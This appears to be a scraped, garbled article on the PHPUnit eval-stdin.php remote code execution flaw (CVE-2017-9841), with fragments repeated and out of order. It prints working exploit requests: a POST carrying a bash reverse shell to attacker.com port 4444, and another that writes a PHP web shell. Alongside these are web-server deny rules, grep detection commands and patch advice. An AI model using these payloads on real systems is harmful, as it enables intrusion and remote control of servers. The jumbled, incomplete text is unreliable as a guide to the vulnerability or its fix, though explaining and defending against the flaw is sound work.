Introduction: A Tiny File with Catastrophic Consequences In the sprawling ecosystem of PHP dependencies, few files have a reputation as infamous as eval-stdin.php . Tucked deep within the phpunit/phpunit source tree ( src/Util/PHP/eval-stdin.php ), this small script became the epicenter of one of the most widely exploited remote code execution (RCE) vulnerabilities in modern web history: CVE-2017-9841 .
POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 Host: victim.com <?php exec('/bin/bash -c "bash -i >& /dev/tcp/attacker.com/4444 0>&1"'); ?> vendor phpunit phpunit src util php eval-stdin.php cve
POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 <?php file_put_contents('shell.php', '<?php system($_GET["cmd"]); ?>'); ?> Introduction: A Tiny File with Catastrophic Consequences In
location ~ ^/vendor/ deny all; return 403; 1. System Information (Reconnaissance) <
https://victim.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php With a raw POST body containing any PHP code. 1. System Information (Reconnaissance)
<Directory "vendor/"> Require all denied </Directory>
grep -r "php://input" vendor/phpunit/ grep -r "eval-stdin" vendor/ Step 1: Immediate Patch (No, Not Just an Update) Simply updating PHPUnit via Composer does not remove the vulnerable file if it already exists. A Composer update adds new versions but leaves old files behind unless you purge first.
Introduction: A Tiny File with Catastrophic Consequences In the sprawling ecosystem of PHP dependencies, few files have a reputation as infamous as eval-stdin.php . Tucked deep within the phpunit/phpunit source tree ( src/Util/PHP/eval-stdin.php ), this small script became the epicenter of one of the most widely exploited remote code execution (RCE) vulnerabilities in modern web history: CVE-2017-9841 .
POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 Host: victim.com <?php exec('/bin/bash -c "bash -i >& /dev/tcp/attacker.com/4444 0>&1"'); ?>
POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 <?php file_put_contents('shell.php', '<?php system($_GET["cmd"]); ?>'); ?>
location ~ ^/vendor/ deny all; return 403;
https://victim.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php With a raw POST body containing any PHP code. 1. System Information (Reconnaissance)
<Directory "vendor/"> Require all denied </Directory>
grep -r "php://input" vendor/phpunit/ grep -r "eval-stdin" vendor/ Step 1: Immediate Patch (No, Not Just an Update) Simply updating PHPUnit via Composer does not remove the vulnerable file if it already exists. A Composer update adds new versions but leaves old files behind unless you purge first.